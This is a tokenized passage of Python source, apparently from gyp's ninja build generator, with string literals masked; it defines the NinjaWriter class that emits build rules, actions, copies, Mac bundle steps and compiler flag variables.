FinalOutput ( ) or self . preaction_stamp <EOL> def PreCompileInput ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . actions_stamp or self . precompile_stamp <EOL> def FinalOutput ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . bundle or self . binary or self . actions_stamp <EOL> class NinjaWriter ( object ) : <EOL> def __init__ ( self , hash_for_rules , target_outputs , base_dir , build_dir , <EOL> output_file , toplevel_build , output_file_name , flavor , <EOL> toplevel_dir = None ) : <EOL> """<STR_LIT>""" <EOL> self . hash_for_rules = hash_for_rules <EOL> self . target_outputs = target_outputs <EOL> self . base_dir = base_dir <EOL> self . build_dir = build_dir <EOL> self . ninja = ninja_syntax . Writer ( output_file ) <EOL> self . toplevel_build = toplevel_build <EOL> self . output_file_name = output_file_name <EOL> self . flavor = flavor <EOL> self . abs_build_dir = None <EOL> if toplevel_dir is not None : <EOL> self . abs_build_dir = os . path . abspath ( os . path . join ( toplevel_dir , <EOL> build_dir ) ) <EOL> self . obj_ext = '<STR_LIT>' if flavor == '<STR_LIT>' else '<STR_LIT>' <EOL> if flavor == '<STR_LIT>' : <EOL> self . win_env = { } <EOL> for arch in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . win_env [ arch ] = '<STR_LIT>' + arch <EOL> build_to_top = gyp . common . InvertRelativePath ( build_dir , toplevel_dir ) <EOL> self . build_to_base = os . path . join ( build_to_top , base_dir ) <EOL> base_to_top = gyp . common . InvertRelativePath ( base_dir , toplevel_dir ) <EOL> self . base_to_build = os . path . join ( base_to_top , build_dir ) <EOL> def ExpandSpecial ( self , path , product_dir = None ) : <EOL> """<STR_LIT>""" <EOL> PRODUCT_DIR = '<STR_LIT>' <EOL> if PRODUCT_DIR in path : <EOL> if product_dir : <EOL> path = path . replace ( PRODUCT_DIR , product_dir ) <EOL> else : <EOL> path = path . replace ( PRODUCT_DIR + '<STR_LIT:/>' , '<STR_LIT>' ) <EOL> path = path . replace ( PRODUCT_DIR + '<STR_LIT:\\>' , '<STR_LIT>' ) <EOL> path = path . replace ( PRODUCT_DIR , '<STR_LIT:.>' ) <EOL> INTERMEDIATE_DIR = '<STR_LIT>' <EOL> if INTERMEDIATE_DIR in path : <EOL> int_dir = self . GypPathToUniqueOutput ( '<STR_LIT>' ) <EOL> path = path . replace ( INTERMEDIATE_DIR , <EOL> os . path . join ( product_dir or '<STR_LIT>' , int_dir ) ) <EOL> CONFIGURATION_NAME = '<STR_LIT>' <EOL> path = path . replace ( CONFIGURATION_NAME , self . config_name ) <EOL> return path <EOL> def ExpandRuleVariables ( self , path , root , dirname , source , ext , name ) : <EOL> if self . flavor == '<STR_LIT>' : <EOL> path = self . msvs_settings . ConvertVSMacros ( <EOL> path , config = self . config_name ) <EOL> path = path . replace ( generator_default_variables [ '<STR_LIT>' ] , root ) <EOL> path = path . replace ( generator_default_variables [ '<STR_LIT>' ] , <EOL> dirname ) <EOL> path = path . replace ( generator_default_variables [ '<STR_LIT>' ] , source ) <EOL> path = path . replace ( generator_default_variables [ '<STR_LIT>' ] , ext ) <EOL> path = path . replace ( generator_default_variables [ '<STR_LIT>' ] , name ) <EOL> return path <EOL> def GypPathToNinja ( self , path , env = None ) : <EOL> """<STR_LIT>""" <EOL> if env : <EOL> if self . flavor == '<STR_LIT>' : <EOL> path = gyp . xcode_emulation . ExpandEnvVars ( path , env ) <EOL> elif self . flavor == '<STR_LIT>' : <EOL> path = gyp . msvs_emulation . ExpandMacros ( path , env ) <EOL> if path . startswith ( '<STR_LIT>' ) : <EOL> expanded = self . ExpandSpecial ( path ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> expanded = os . path . normpath ( expanded ) <EOL> return expanded <EOL> if '<STR_LIT>' in path : <EOL> path = self . ExpandSpecial ( path ) <EOL> assert '<STR_LIT:$>' not in path , path <EOL> return os . path . normpath ( os . path . join ( self . build_to_base , path ) ) <EOL> def GypPathToUniqueOutput ( self , path , qualified = True ) : <EOL> """<STR_LIT>""" <EOL> path = self . ExpandSpecial ( path ) <EOL> assert not path . startswith ( '<STR_LIT:$>' ) , path <EOL> obj = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> obj += '<STR_LIT:.>' + self . toolset <EOL> path_dir , path_basename = os . path . split ( path ) <EOL> if qualified : <EOL> path_basename = self . name + '<STR_LIT:.>' + path_basename <EOL> base_dir = self . base_dir . split ( os . sep ) <EOL> i = next ( i for i , x in enumerate ( base_dir ) if x != '<STR_LIT:..>' ) <EOL> base_dir = ( '<STR_LIT:..>' * i ) + os . sep . join ( base_dir [ i : ] ) <EOL> return os . path . normpath ( os . path . join ( obj , base_dir , path_dir , <EOL> path_basename ) ) <EOL> def WriteCollapsedDependencies ( self , name , targets , order_only = None ) : <EOL> """<STR_LIT>""" <EOL> assert targets == list ( filter ( None , targets ) ) , targets <EOL> if len ( targets ) == <NUM_LIT:0> : <EOL> assert not order_only <EOL> return None <EOL> if len ( targets ) > <NUM_LIT:1> or order_only : <EOL> stamp = self . GypPathToUniqueOutput ( name + '<STR_LIT>' ) <EOL> targets = self . ninja . build ( stamp , '<STR_LIT>' , targets , order_only = order_only ) <EOL> self . ninja . newline ( ) <EOL> return targets [ <NUM_LIT:0> ] <EOL> def _SubninjaNameForArch ( self , arch ) : <EOL> output_file_base = os . path . splitext ( self . output_file_name ) [ <NUM_LIT:0> ] <EOL> return '<STR_LIT>' % ( output_file_base , arch ) <EOL> def WriteSpec ( self , spec , config_name , generator_flags ) : <EOL> """<STR_LIT>""" <EOL> self . config_name = config_name <EOL> self . name = spec [ '<STR_LIT>' ] <EOL> self . toolset = spec [ '<STR_LIT>' ] <EOL> config = spec [ '<STR_LIT>' ] [ config_name ] <EOL> self . target = Target ( spec [ '<STR_LIT:type>' ] ) <EOL> self . is_standalone_static_library = bool ( <EOL> spec . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> self . uses_cpp = False <EOL> self . is_mac_bundle = gyp . xcode_emulation . IsMacBundle ( self . flavor , spec ) <EOL> self . xcode_settings = self . msvs_settings = None <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . xcode_settings = gyp . xcode_emulation . XcodeSettings ( spec ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . msvs_settings = gyp . msvs_emulation . MsvsSettings ( spec , <EOL> generator_flags ) <EOL> arch = self . msvs_settings . GetArch ( config_name ) <EOL> self . ninja . variable ( '<STR_LIT>' , self . win_env [ arch ] ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . archs = self . xcode_settings . GetActiveArchs ( config_name ) <EOL> if len ( self . archs ) > <NUM_LIT:1> : <EOL> self . arch_subninjas = dict ( <EOL> ( arch , ninja_syntax . Writer ( <EOL> OpenOutput ( os . path . join ( self . toplevel_build , <EOL> self . _SubninjaNameForArch ( arch ) ) , <EOL> '<STR_LIT:w>' ) ) ) <EOL> for arch in self . archs ) <EOL> actions_depends = [ ] <EOL> compile_depends = [ ] <EOL> if '<STR_LIT>' in spec : <EOL> for dep in spec [ '<STR_LIT>' ] : <EOL> if dep in self . target_outputs : <EOL> target = self . target_outputs [ dep ] <EOL> actions_depends . append ( target . PreActionInput ( self . flavor ) ) <EOL> compile_depends . append ( target . PreCompileInput ( ) ) <EOL> actions_depends = list ( filter ( None , actions_depends ) ) <EOL> compile_depends = list ( filter ( None , compile_depends ) ) <EOL> actions_depends = self . WriteCollapsedDependencies ( '<STR_LIT>' , <EOL> actions_depends ) <EOL> compile_depends = self . WriteCollapsedDependencies ( '<STR_LIT>' , <EOL> compile_depends ) <EOL> self . target . preaction_stamp = actions_depends <EOL> self . target . precompile_stamp = compile_depends <EOL> extra_sources = [ ] <EOL> mac_bundle_depends = [ ] <EOL> self . target . actions_stamp = self . WriteActionsRulesCopies ( <EOL> spec , extra_sources , actions_depends , mac_bundle_depends ) <EOL> compile_depends_stamp = ( self . target . actions_stamp or compile_depends ) <EOL> link_deps = [ ] <EOL> sources = extra_sources + spec . get ( '<STR_LIT>' , [ ] ) <EOL> if sources : <EOL> if self . flavor == '<STR_LIT>' and len ( self . archs ) > <NUM_LIT:1> : <EOL> for arch in self . archs : <EOL> self . ninja . subninja ( self . _SubninjaNameForArch ( arch ) ) <EOL> pch = None <EOL> if self . flavor == '<STR_LIT>' : <EOL> gyp . msvs_emulation . VerifyMissingSources ( <EOL> sources , self . abs_build_dir , generator_flags , self . GypPathToNinja ) <EOL> pch = gyp . msvs_emulation . PrecompiledHeader ( <EOL> self . msvs_settings , config_name , self . GypPathToNinja , <EOL> self . GypPathToUniqueOutput , self . obj_ext ) <EOL> else : <EOL> pch = gyp . xcode_emulation . MacPrefixHeader ( <EOL> self . xcode_settings , self . GypPathToNinja , <EOL> lambda path , lang : self . GypPathToUniqueOutput ( path + '<STR_LIT:->' + lang ) ) <EOL> link_deps = self . WriteSources ( <EOL> self . ninja , config_name , config , sources , compile_depends_stamp , pch , <EOL> spec ) <EOL> obj_outputs = [ f for f in sources if f . endswith ( self . obj_ext ) ] <EOL> if obj_outputs : <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> link_deps += [ self . GypPathToNinja ( o ) for o in obj_outputs ] <EOL> else : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" % spec [ '<STR_LIT>' ] , <EOL> file = sys . stderr ) <EOL> elif self . flavor == '<STR_LIT>' and len ( self . archs ) > <NUM_LIT:1> : <EOL> link_deps = collections . defaultdict ( list ) <EOL> if self . flavor == '<STR_LIT>' and self . target . type == '<STR_LIT>' : <EOL> self . target . component_objs = link_deps <EOL> output = None <EOL> is_empty_bundle = not link_deps and not mac_bundle_depends <EOL> if link_deps or self . target . actions_stamp or actions_depends : <EOL> output = self . WriteTarget ( spec , config_name , config , link_deps , <EOL> self . target . actions_stamp or actions_depends ) <EOL> if self . is_mac_bundle : <EOL> mac_bundle_depends . append ( output ) <EOL> if self . is_mac_bundle : <EOL> output = self . WriteMacBundle ( spec , mac_bundle_depends , is_empty_bundle ) <EOL> if not output : <EOL> return None <EOL> assert self . target . FinalOutput ( ) , output <EOL> return self . target <EOL> def _WinIdlRule ( self , source , prebuild , outputs ) : <EOL> """<STR_LIT>""" <EOL> outdir , output , vars , flags = self . msvs_settings . GetIdlBuildData ( <EOL> source , self . config_name ) <EOL> outdir = self . GypPathToNinja ( outdir ) <EOL> def fix_path ( path , rel = None ) : <EOL> path = os . path . join ( outdir , path ) <EOL> dirname , basename = os . path . split ( source ) <EOL> root , ext = os . path . splitext ( basename ) <EOL> path = self . ExpandRuleVariables ( <EOL> path , root , dirname , source , ext , basename ) <EOL> if rel : <EOL> path = os . path . relpath ( path , rel ) <EOL> return path <EOL> vars = [ ( name , fix_path ( value , outdir ) ) for name , value in vars ] <EOL> output = [ fix_path ( p ) for p in output ] <EOL> vars . append ( ( '<STR_LIT>' , outdir ) ) <EOL> vars . append ( ( '<STR_LIT>' , flags ) ) <EOL> input = self . GypPathToNinja ( source ) <EOL> self . ninja . build ( output , '<STR_LIT>' , input , <EOL> variables = vars , order_only = prebuild ) <EOL> outputs . extend ( output ) <EOL> def WriteWinIdlFiles ( self , spec , prebuild ) : <EOL> """<STR_LIT>""" <EOL> assert self . flavor == '<STR_LIT>' <EOL> if self . msvs_settings . HasExplicitIdlRulesOrActions ( spec ) : <EOL> return [ ] <EOL> outputs = [ ] <EOL> for source in filter ( lambda x : x . endswith ( '<STR_LIT>' ) , spec [ '<STR_LIT>' ] ) : <EOL> self . _WinIdlRule ( source , prebuild , outputs ) <EOL> return outputs <EOL> def WriteActionsRulesCopies ( self , spec , extra_sources , prebuild , <EOL> mac_bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> outputs = [ ] <EOL> if self . is_mac_bundle : <EOL> mac_bundle_resources = spec . get ( '<STR_LIT>' , [ ] ) [ : ] <EOL> else : <EOL> mac_bundle_resources = [ ] <EOL> extra_mac_bundle_resources = [ ] <EOL> if '<STR_LIT>' in spec : <EOL> outputs += self . WriteActions ( spec [ '<STR_LIT>' ] , extra_sources , prebuild , <EOL> extra_mac_bundle_resources ) <EOL> if '<STR_LIT>' in spec : <EOL> outputs += self . WriteRules ( spec [ '<STR_LIT>' ] , extra_sources , prebuild , <EOL> mac_bundle_resources , <EOL> extra_mac_bundle_resources ) <EOL> if '<STR_LIT>' in spec : <EOL> outputs += self . WriteCopies ( spec [ '<STR_LIT>' ] , prebuild , mac_bundle_depends ) <EOL> if '<STR_LIT>' in spec and self . flavor == '<STR_LIT>' : <EOL> outputs += self . WriteWinIdlFiles ( spec , prebuild ) <EOL> stamp = self . WriteCollapsedDependencies ( '<STR_LIT>' , outputs ) <EOL> if self . is_mac_bundle : <EOL> xcassets = self . WriteMacBundleResources ( <EOL> extra_mac_bundle_resources + mac_bundle_resources , mac_bundle_depends ) <EOL> partial_info_plist = self . WriteMacXCassets ( xcassets , mac_bundle_depends ) <EOL> self . WriteMacInfoPlist ( partial_info_plist , mac_bundle_depends ) <EOL> return stamp <EOL> def GenerateDescription ( self , verb , message , fallback ) : <EOL> """<STR_LIT>""" <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> verb += '<STR_LIT>' % self . toolset <EOL> if message : <EOL> return '<STR_LIT>' % ( verb , self . ExpandSpecial ( message ) ) <EOL> else : <EOL> return '<STR_LIT>' % ( verb , self . name , fallback ) <EOL> def WriteActions ( self , actions , extra_sources , prebuild , <EOL> extra_mac_bundle_resources ) : <EOL> env = self . GetToolchainEnv ( ) <EOL> all_outputs = [ ] <EOL> for action in actions : <EOL> name = '<STR_LIT>' % ( action [ '<STR_LIT>' ] , self . hash_for_rules ) <EOL> description = self . GenerateDescription ( '<STR_LIT>' , <EOL> action . get ( '<STR_LIT:message>' , None ) , <EOL> name ) <EOL> is_cygwin = ( self . msvs_settings . IsRuleRunUnderCygwin ( action ) <EOL> if self . flavor == '<STR_LIT>' else False ) <EOL> args = action [ '<STR_LIT:action>' ] <EOL> pool = '<STR_LIT>' if int ( action . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) else None <EOL> rule_name , _ = self . WriteNewNinjaRule ( name , args , description , <EOL> is_cygwin , env , pool ) <EOL> inputs = [ self . GypPathToNinja ( i , env ) for i in action [ '<STR_LIT>' ] ] <EOL> if int ( action . get ( '<STR_LIT>' , False ) ) : <EOL> extra_sources += action [ '<STR_LIT>' ] <EOL> if int ( action . get ( '<STR_LIT>' , False ) ) : <EOL> extra_mac_bundle_resources += action [ '<STR_LIT>' ] <EOL> outputs = [ self . GypPathToNinja ( o , env ) for o in action [ '<STR_LIT>' ] ] <EOL> self . ninja . build ( outputs , rule_name , inputs , <EOL> order_only = prebuild ) <EOL> all_outputs += outputs <EOL> self . ninja . newline ( ) <EOL> return all_outputs <EOL> def WriteRules ( self , rules , extra_sources , prebuild , <EOL> mac_bundle_resources , extra_mac_bundle_resources ) : <EOL> env = self . GetToolchainEnv ( ) <EOL> all_outputs = [ ] <EOL> for rule in rules : <EOL> if '<STR_LIT:action>' not in rule and not rule . get ( '<STR_LIT>' , [ ] ) : <EOL> continue <EOL> name = '<STR_LIT>' % ( rule [ '<STR_LIT>' ] , self . hash_for_rules ) <EOL> args = rule [ '<STR_LIT:action>' ] <EOL> description = self . GenerateDescription ( <EOL> '<STR_LIT>' , <EOL> rule . get ( '<STR_LIT:message>' , None ) , <EOL> ( '<STR_LIT>' + generator_default_variables [ '<STR_LIT>' ] ) % name ) <EOL> is_cygwin = ( self . msvs_settings . IsRuleRunUnderCygwin ( rule ) <EOL> if self . flavor == '<STR_LIT>' else False ) <EOL> pool = '<STR_LIT>' if int ( rule . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) else None <EOL> rule_name , args = self . WriteNewNinjaRule ( <EOL> name , args , description , is_cygwin , env , pool ) <EOL> special_locals = ( '<STR_LIT:source>' , '<STR_LIT:root>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> needed_variables = set ( [ '<STR_LIT:source>' ] ) <EOL> for argument in args : <EOL> for var in special_locals : <EOL> if '<STR_LIT>' % var in argument : <EOL> needed_variables . add ( var ) <EOL> def cygwin_munge ( path ) : <EOL> if is_cygwin : <EOL> return path . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> return path <EOL> inputs = [ self . GypPathToNinja ( i , env ) for i in rule . get ( '<STR_LIT>' , [ ] ) ] <EOL> sources = rule . get ( '<STR_LIT>' , [ ] ) <EOL> num_inputs = len ( inputs ) <EOL> if prebuild : <EOL> num_inputs += <NUM_LIT:1> <EOL> if num_inputs > <NUM_LIT:2> and len ( sources ) > <NUM_LIT:2> : <EOL> inputs = [ self . WriteCollapsedDependencies ( <EOL> rule [ '<STR_LIT>' ] , inputs , order_only = prebuild ) ] <EOL> prebuild = [ ] <EOL> for source in sources : <EOL> source = os . path . normpath ( source ) <EOL> dirname , basename = os . path . split ( source ) <EOL> root , ext = os . path . splitext ( basename ) <EOL> outputs = [ self . ExpandRuleVariables ( o , root , dirname , <EOL> source , ext , basename ) <EOL> for o in rule [ '<STR_LIT>' ] ] <EOL> if int ( rule . get ( '<STR_LIT>' , False ) ) : <EOL> extra_sources += outputs <EOL> was_mac_bundle_resource = source in mac_bundle_resources <EOL> if was_mac_bundle_resource or int ( rule . get ( '<STR_LIT>' , False ) ) : <EOL> extra_mac_bundle_resources += outputs <EOL> if was_mac_bundle_resource : <EOL> mac_bundle_resources . remove ( source ) <EOL> extra_bindings = [ ] <EOL> for var in needed_variables : <EOL> if var == '<STR_LIT:root>' : <EOL> extra_bindings . append ( ( '<STR_LIT:root>' , cygwin_munge ( root ) ) ) <EOL> elif var == '<STR_LIT>' : <EOL> dirname_expanded = self . ExpandSpecial ( dirname , self . base_to_build ) <EOL> extra_bindings . append ( ( '<STR_LIT>' , cygwin_munge ( dirname_expanded ) ) ) <EOL> elif var == '<STR_LIT:source>' : <EOL> source_expanded = self . ExpandSpecial ( source , self . base_to_build ) <EOL> extra_bindings . append ( ( '<STR_LIT:source>' , cygwin_munge ( source_expanded ) ) ) <EOL> elif var == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , ext ) ) <EOL> elif var == '<STR_LIT:name>' : <EOL> extra_bindings . append ( ( '<STR_LIT:name>' , cygwin_munge ( basename ) ) ) <EOL> else : <EOL> assert var == None , repr ( var ) <EOL> outputs = [ self . GypPathToNinja ( o , env ) for o in outputs ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> extra_bindings . append ( ( '<STR_LIT>' , <EOL> hashlib . md5 ( outputs [ <NUM_LIT:0> ] ) . hexdigest ( ) ) ) <EOL> self . ninja . build ( outputs , rule_name , self . GypPathToNinja ( source ) , <EOL> implicit = inputs , <EOL> order_only = prebuild , <EOL> variables = extra_bindings ) <EOL> all_outputs . extend ( outputs ) <EOL> return all_outputs <EOL> def WriteCopies ( self , copies , prebuild , mac_bundle_depends ) : <EOL> outputs = [ ] <EOL> env = self . GetToolchainEnv ( ) <EOL> for copy in copies : <EOL> for path in copy [ '<STR_LIT>' ] : <EOL> path = os . path . normpath ( path ) <EOL> basename = os . path . split ( path ) [ <NUM_LIT:1> ] <EOL> src = self . GypPathToNinja ( path , env ) <EOL> dst = self . GypPathToNinja ( os . path . join ( copy [ '<STR_LIT>' ] , basename ) , <EOL> env ) <EOL> outputs += self . ninja . build ( dst , '<STR_LIT>' , src , order_only = prebuild ) <EOL> if self . is_mac_bundle : <EOL> if dst . startswith ( self . xcode_settings . GetBundleContentsFolderPath ( ) ) : <EOL> mac_bundle_depends . append ( dst ) <EOL> return outputs <EOL> def WriteMacBundleResources ( self , resources , bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> xcassets = [ ] <EOL> for output , res in gyp . xcode_emulation . GetMacBundleResources ( <EOL> generator_default_variables [ '<STR_LIT>' ] , <EOL> self . xcode_settings , map ( self . GypPathToNinja , resources ) ) : <EOL> output = self . ExpandSpecial ( output ) <EOL> if os . path . splitext ( output ) [ - <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> self . ninja . build ( output , '<STR_LIT>' , res , <EOL> variables = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> bundle_depends . append ( output ) <EOL> else : <EOL> xcassets . append ( res ) <EOL> return xcassets <EOL> def WriteMacXCassets ( self , xcassets , bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> if not xcassets : <EOL> return <EOL> extra_arguments = { } <EOL> settings_to_arg = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> settings = self . xcode_settings . xcode_settings [ self . config_name ] <EOL> for settings_key , arg_name in settings_to_arg . iteritems ( ) : <EOL> value = settings . get ( settings_key ) <EOL> if value : <EOL> extra_arguments [ arg_name ] = value <EOL> partial_info_plist = None <EOL> if extra_arguments : <EOL> partial_info_plist = self . GypPathToUniqueOutput ( <EOL> '<STR_LIT>' ) <EOL> extra_arguments [ '<STR_LIT>' ] = partial_info_plist <EOL> outputs = [ ] <EOL> outputs . append ( <EOL> os . path . join ( <EOL> self . xcode_settings . GetBundleResourceFolder ( ) , <EOL> '<STR_LIT>' ) ) <EOL> if partial_info_plist : <EOL> outputs . append ( partial_info_plist ) <EOL> keys = QuoteShellArgument ( json . dumps ( extra_arguments ) , self . flavor ) <EOL> extra_env = self . xcode_settings . GetPerTargetSettings ( ) <EOL> env = self . GetSortedXcodeEnv ( additional_settings = extra_env ) <EOL> env = self . ComputeExportEnvString ( env ) <EOL> bundle_depends . extend ( self . ninja . build ( <EOL> outputs , '<STR_LIT>' , xcassets , <EOL> variables = [ ( '<STR_LIT>' , env ) , ( '<STR_LIT>' , keys ) ] ) ) <EOL> return partial_info_plist <EOL> def WriteMacInfoPlist ( self , partial_info_plist , bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> info_plist , out , defines , extra_env = gyp . xcode_emulation . GetMacInfoPlist ( <EOL> generator_default_variables [ '<STR_LIT>' ] , <EOL> self . xcode_settings , self . GypPathToNinja ) <EOL> if not info_plist : <EOL> return <EOL> out = self . ExpandSpecial ( out ) <EOL> if defines : <EOL> intermediate_plist = self . GypPathToUniqueOutput ( <EOL> os . path . basename ( info_plist ) ) <EOL> defines = '<STR_LIT:U+0020>' . join ( [ Define ( d , self . flavor ) for d in defines ] ) <EOL> info_plist = self . ninja . build ( <EOL> intermediate_plist , '<STR_LIT>' , info_plist , <EOL> variables = [ ( '<STR_LIT>' , defines ) ] ) <EOL> env = self . GetSortedXcodeEnv ( additional_settings = extra_env ) <EOL> env = self . ComputeExportEnvString ( env ) <EOL> if partial_info_plist : <EOL> intermediate_plist = self . GypPathToUniqueOutput ( '<STR_LIT>' ) <EOL> info_plist = self . ninja . build ( <EOL> intermediate_plist , '<STR_LIT>' , <EOL> [ partial_info_plist , info_plist ] ) <EOL> keys = self . xcode_settings . GetExtraPlistItems ( self . config_name ) <EOL> keys = QuoteShellArgument ( json . dumps ( keys ) , self . flavor ) <EOL> self . ninja . build ( out , '<STR_LIT>' , info_plist , <EOL> variables = [ ( '<STR_LIT>' , env ) , ( '<STR_LIT>' , keys ) ] ) <EOL> bundle_depends . append ( out ) <EOL> def WriteSources ( self , ninja_file , config_name , config , sources , predepends , <EOL> precompiled_header , spec ) : <EOL> """<STR_LIT>""" <EOL> if self . toolset == '<STR_LIT:host>' : <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> return self . WriteSourcesForArch ( <EOL> self . ninja , config_name , config , sources , predepends , <EOL> precompiled_header , spec ) <EOL> else : <EOL> return dict ( ( arch , self . WriteSourcesForArch ( <EOL> self . arch_subninjas [ arch ] , config_name , config , sources , predepends , <EOL> precompiled_header , spec , arch = arch ) ) <EOL> for arch in self . archs ) <EOL> def WriteSourcesForArch ( self , ninja_file , config_name , config , sources , <EOL> predepends , precompiled_header , spec , arch = None ) : <EOL> """<STR_LIT>""" <EOL> extra_defines = [ ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> cflags = self . xcode_settings . GetCflags ( config_name , arch = arch ) <EOL> cflags_c = self . xcode_settings . GetCflagsC ( config_name ) <EOL> cflags_cc = self . xcode_settings . GetCflagsCC ( config_name ) <EOL> cflags_objc = [ '<STR_LIT>' ] + self . xcode_settings . GetCflagsObjC ( config_name ) <EOL> cflags_objcc = [ '<STR_LIT>' ] + self . xcode_settings . GetCflagsObjCC ( config_name ) <EOL> elif self . flavor == '<STR_LIT>' : <EOL> asmflags = self . msvs_settings . GetAsmflags ( config_name ) <EOL> cflags = self . msvs_settings . GetCflags ( config_name ) <EOL> cflags_c = self . msvs_settings . GetCflagsC ( config_name ) <EOL> cflags_cc = self . msvs_settings . GetCflagsCC ( config_name ) <EOL> extra_defines = self . msvs_settings . GetComputedDefines ( config_name ) <EOL> pdbpath_c = pdbpath_cc = self . msvs_settings . GetCompilerPdbName ( <EOL> config_name , self . ExpandSpecial ) <EOL> if not pdbpath_c : <EOL> obj = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> obj += '<STR_LIT:.>' + self . toolset <EOL> pdbpath = os . path . normpath ( os . path . join ( obj , self . base_dir , self . name ) ) <EOL> pdbpath_c = pdbpath + '<STR_LIT>' <EOL> pdbpath_cc = pdbpath + '<STR_LIT>' <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , [ pdbpath_c ] ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , [ pdbpath_cc ] ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , [ self . name ] ) <EOL> else : <EOL> cflags = config . get ( '<STR_LIT>' , [ ] ) <EOL> cflags_c = config . get ( '<STR_LIT>' , [ ] ) <EOL> cflags_cc = config . get ( '<STR_LIT>' , [ ] ) <EOL> if self . toolset == '<STR_LIT:target>' : <EOL> cflags_c = ( os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + cflags_c ) <EOL> cflags_cc = ( os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) + cflags_cc ) <EOL> defines = config . get ( '<STR_LIT>' , [ ] ) + extra_defines <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ Define ( d , self . flavor ) for d in defines ] ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , asmflags ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( self . ExpandSpecial ( f ) , self . flavor ) <EOL> for f in self . msvs_settings . GetRcflags ( config_name , <EOL> self . GypPathToNinja ) ] ) <EOL> include_dirs = config . get ( '<STR_LIT>' , [ ] ) <EOL> env = self . GetToolchainEnv ( ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> include_dirs = self . msvs_settings . AdjustIncludeDirs ( include_dirs , <EOL> config_name ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( i , env ) , self . flavor ) <EOL> for i in include_dirs ] ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> midl_include_dirs = config . get ( '<STR_LIT>' , [ ] ) <EOL> midl_include_dirs = self . msvs_settings . AdjustMidlIncludeDirs ( <EOL> midl_include_dirs , config_name ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> [ QuoteShellArgument ( '<STR_LIT>' + self . GypPathToNinja ( i , env ) , self . flavor ) <EOL> for i in midl_include_dirs ] ) <EOL> pch_commands = precompiled_header . GetPchBuildCommands ( arch ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> for ext , var in [ ( '<STR_LIT:c>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:m>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> include = precompiled_header . GetInclude ( ext , arch ) <EOL> if include : ninja_file . variable ( var , include ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags_c ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags_cc ) ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , cflags_objc ) ) <EOL> self . WriteVariableList ( ninja_file , '<STR_LIT>' , <EOL> map ( self . ExpandSpecial , 